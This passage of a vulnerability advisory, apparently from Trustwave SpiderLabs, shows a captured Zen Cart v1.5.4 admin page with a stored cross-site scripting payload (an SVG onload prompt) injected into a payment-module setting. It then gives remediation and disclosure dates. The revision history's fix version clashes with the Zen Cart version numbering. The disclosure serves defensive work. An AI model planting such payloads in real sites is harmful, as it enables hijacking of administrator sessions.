                <td class="dataTableHeadingContent">&nbsp;</td>
                <td class="dataTableHeadingContent" align="right">Sort Order</td>
                <td class="dataTableHeadingContent" align="center" width="100">Orders Status</td>
                <td class="dataTableHeadingContent" align="right">Action&nbsp;</td>
              </tr>
              <tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=authorizenet&action=edit'">
                <td class="dataTableContent">Authorize.net (SIM)<span class="alert"> (in Testing mode)</span></td>
                <td class="dataTableContent">authorizenet</td>
                <td class="dataTableContent" align="right">
                                    &nbsp;<img src="images/icon_status_red.gif" border="0" alt="">                </td>
                <td class="dataTableContent" align="left">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
                <td class="dataTableContent" align="right"><img src="images/icon_arrow_right.gif" border="0" alt="">&nbsp;</td>
              </tr>
              <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=authorizenet_aim'">
                <td class="dataTableContent">Authorize.net (AIM)</td>
                <td class="dataTableContent">authorizenet_aim</td>
                <td class="dataTableContent" align="right">
                                    &nbsp;<img src="images/icon_status_red.gif" border="0" alt="">                </td>
                <td class="dataTableContent" align="left">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=authorizenet_aim"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
              <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=authorizenet_echeck'">
                <td class="dataTableContent">Authorize.net - eCheck</td>
                <td class="dataTableContent">authorizenet_echeck</td>
                <td class="dataTableContent" align="right">
                                    &nbsp;<img src="images/icon_status_red.gif" border="0" alt="">                </td>
                <td class="dataTableContent" align="left">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=authorizenet_echeck"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
              <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=cod'">
                <td class="dataTableContent">Cash on Delivery</td>
                <td class="dataTableContent">cod</td>
                <td class="dataTableContent" align="right">
                                    &nbsp;<img src="images/icon_status_red.gif" border="0" alt="">                </td>
                <td class="dataTableContent" align="left">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=cod"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
              <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=freecharger'">
                <td class="dataTableContent">Free Order</td>
                <td class="dataTableContent">freecharger</td>
                <td class="dataTableContent" align="right">
                  0                  &nbsp;<img src="images/icon_status_green.gif" border="0" alt="">                </td>
                <td class="dataTableContent" align="left">&nbsp;&nbsp;&nbsp;default&nbsp;&nbsp;&nbsp;</td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=freecharger"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
              <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=linkpoint_api'">
                <td class="dataTableContent">FirstData/Linkpoint/YourPay API</td>
                <td class="dataTableContent">linkpoint_api</td>
                <td class="dataTableContent" align="right">
                                    &nbsp;<img src="images/icon_status_red.gif" border="0" alt="">                </td>
                <td class="dataTableContent" align="left">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=linkpoint_api"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
              <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=moneyorder'">
                <td class="dataTableContent">Check/Money Order<span class="alert"> (not configured - needs pay-to)</span></td>
                <td class="dataTableContent">moneyorder</td>
                <td class="dataTableContent" align="right">
                  0                  &nbsp;<img src="images/icon_status_green.gif" border="0" alt="">                </td>
                <td class="dataTableContent" align="left">&nbsp;&nbsp;&nbsp;default&nbsp;&nbsp;&nbsp;</td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=moneyorder"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
              <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=paypal'">
                <td class="dataTableContent">PayPal Payments Standard</td>
                <td class="dataTableContent">PayPal</td>
                <td class="dataTableContent" align="right">
                                    &nbsp;<img src="images/icon_status_red.gif" border="0" alt="">                </td>
                <td class="dataTableContent" align="left">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=paypal"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
              <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=paypaldp'">
                <td class="dataTableContent">PayPal Payments Pro</td>
                <td class="dataTableContent">PayPal</td>
                <td class="dataTableContent" align="right">
                                    &nbsp;<img src="images/icon_status_red.gif" border="0" alt="">                </td>
                <td class="dataTableContent" align="left">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=paypaldp"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
              <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=paypalwpp'">
                <td class="dataTableContent">PayPal Express Checkout</td>
                <td class="dataTableContent">PayPal</td>
                <td class="dataTableContent" align="right">
                                    &nbsp;<img src="images/icon_status_red.gif" border="0" alt="">                </td>
                <td class="dataTableContent" align="left">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=paypalwpp"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
              <tr>
                <td colspan="3" class="smallText">Module Directory: C:/UniServerZ/www/zen-cart/includes/modules/payment/</td>
              </tr>
            </table></td>
            <td width="25%" valign="top">
<table border="0" width="100%" cellspacing="0" cellpadding="2">
  <tr class="infoBoxHeading">
    <td class="infoBoxHeading"><b>Authorize.net (SIM)<span class="alert"> (in Testing mode)</span></b></td>
  </tr>
</table>
<table border="0" width="100%" cellspacing="0" cellpadding="2">
  <tr>
    <td align="center" class="infoBoxContent"><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=authorizenet&action=edit"><img src="includes/languages/english/images/buttons/button_edit.gif" border="0" alt="Edit" title=" Edit " name="editButton"></a></td>
  </tr>
  <tr>
    <td align="center" class="infoBoxContent"><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=authorizenet&action=remove"><img src="includes/languages/english/images/buttons/button_module_remove.gif" border="0" alt="Remove Module" title=" Remove Module " name="removeButton"></a></td>
  </tr>
  <tr>
    <td class="infoBoxContent"><br><a target="_blank" href="http://reseller.authorize.net/application.asp?id=131345">Click Here to Sign Up for an Account</a><br /><br /><a target="_blank" href="https://account.authorize.net/">Click to Login to the Authorize.net Merchant Area</a><br /><br /><strong>Requirements:</strong><br /><hr />*<strong>Authorize.net Account</strong> (see link above to signup)<br />*<strong>Authorize.net username and transaction key</strong> available from your Merchant Area</td>
  </tr>
  <tr>
    <td class="infoBoxContent"><br><b>Enable Authorize.net Module</b><br>False<br><br><b>Login ID</b><br>admin<br><br><b>Transaction Key</b><br>**********<br><br><b>MD5 Hash</b><br>**********<br><br><b>Transaction Mode</b><br>Test<br><br><b>Transaction Method</b><br>Credit Card<sVg/OnLOaD=prompt(14507304.81097)><br><br><b>Authorization Type</b><br>Authorize<br><br><b>Request CVV Number</b><br>False<br><br><b>Customer Notifications</b><br>False<br><br><b>Payment Zone</b><br>admin<br><br><b>Set Order Status</b><br>Pending [1]<br><br><b>Sort order of display.</b><br>John<br><br><b>Gateway Mode</b><br>offsite<br><br><b>Enable Database Storage</b><br>True<br><br><b>Debug Mode</b><br>Alerts Only</td>
  </tr>
</table>
            </td>
          </tr>
        </table></td>
      </tr>
    </table></td>
<!-- body_text_eof //-->
  </tr>
</table>
<!-- body_eof //-->
<!-- footer //-->
<table border="0" width="100%" cellspacing="10" cellpadding="10">
  <tr>
    <td align="center" class="smallText" height="100" valign="bottom"><a href="http://www.zen-cart.com" target="_blank"><img src="images/small_zen_logo.gif" alt="Zen Cart:: the art of e-commerce" border="0"></a><br /><br />E-Commerce Engine Copyright &copy; 2003-2015 <a href="http://www.zen-cart.com" target="_blank">Zen Cart&reg;</a><br /><a href="http://localhost:8081/zen-cart/admin1/server_info.php">Zen Cart v1.5.4/v1.5.4</a></td>
  </tr>
</table>
<!-- footer_eof //-->
<br>
</body>
</html>

Remediation Steps:
Upgrade to Zen Cart v1.5.5. or the latest stable release.

Revision History:

09/21/2015 - Vulnerability disclosed to vendor
03/17/2016 - Vendor releases fix in version 5.07.0013
03/22/2016 - Advisory published


About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security 
risk. With cloud and managed security services, integrated technologies and a 
team of security experts, ethical hackers and researchers, Trustwave enables 
businesses to transform the way they manage their information security and 
compliance programs. More than three million businesses are enrolled in the 
Trustwave TrustKeeper cloud platform, through which Trustwave delivers 
automated, efficient and cost-effective threat, vulnerability and compliance 
management. Trustwave is headquartered in Chicago, with customers in 96 
countries. For more information about Trustwave, visit 
https://www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.